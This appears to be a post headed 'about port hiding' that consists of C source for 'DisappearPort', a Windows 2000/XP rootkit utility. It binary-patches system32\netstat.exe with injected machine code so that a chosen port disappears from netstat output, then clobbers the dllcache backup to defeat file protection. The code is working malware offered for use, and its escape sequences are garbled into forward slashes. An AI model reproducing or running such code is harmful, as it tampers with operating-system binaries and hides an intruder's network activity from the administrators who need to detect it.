关于端口隐藏

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define taille 28432
#define offprelude 9859
#define offcode 11298

int main (int argc, char *argv[]) {

int i;
char port[6];
char version[7];
char *netstat;
char buff[taille];
char *env=getenv ("systemroot");
FILE *nethnd;

char prelude[]="/xE8/x9A/x05/x00/x00/x75/x03/xEB/x5B/x90";

char code[]="/x8B/x5D/xFC/x51/xB9/x00/x00/x00/x00/x41/x80/x3C/x0B"
            "/x3A/x75/xF9/x8B/x34/x0B/x81/xFE/x3A/x20/x20/x20/x75"
            "/x14/x83/xC1/x04/x8B/x34/x0B/x81/xFE/x20/x20/x20/x20"
            "/x75/x06/x59/x33/xDB/x33/xF6/xC3/x59/x33/xDB/x33/xF6"
            "/xA9/x66/x06/x00/x00/xC3";

printf ("----------------------------------------------/n");
printf ("DisappearPort v1.1 for win2k/XP, Code by LinFodUnEt/n");
printf ("----------------------------------------------/n/n");

if (!argv[1]) {
printf ("/nUsage : %s <Port of Disappear>/n",argv[0]);
exit(0);
}

strncpy (port,argv[1],6);

for ( i=0 ; i < 7 ; i++)
 if (port[i] == 0x00) port[i]=0x20;

netstat = malloc (sizeof(env) + 34);
strcpy (netstat,env);
strcat (netstat,"//system32//netstat.exe");

nethnd = fopen (netstat,"rb");

if (nethnd  == NULL) {
printf ("Impossbible d'ouvrir netstat.exe/n");
exit(0);
}

fread (buff,1,taille,nethnd);

for (i=0; i<7 ; i++)
version[i]=buff[8720+i];

if (strcmp(version,"tTHt0Ht") != 0) {
printf ("/n/nNo Rootkit in here. Disappear Failed!/n");
exit(0);
}

for ( i=0 ; i < 3 ; i++)
 code[22+i] = port[i];

for ( i=0 ; i < 4 ; i++)
 code[35+i] = port[3+i];

for ( i=0 ; i < 10 ; i++)
 buff[offprelude+i]=prelude[i];

for (i=0 ; i < 58 ; i++)
 buff[offcode+i]=code[i];

nethnd = freopen (netstat,"wb",nethnd);
fwrite (buff,1,taille,nethnd);

sprintf (netstat,"%s//system32//dllcache//netstat.exe",env);

nethnd = freopen (netstat,"wb",nethnd);
fclose (nethnd);

printf ("/nDisappear Successed!,Disappear Port is %s/n",port);

return(0);
}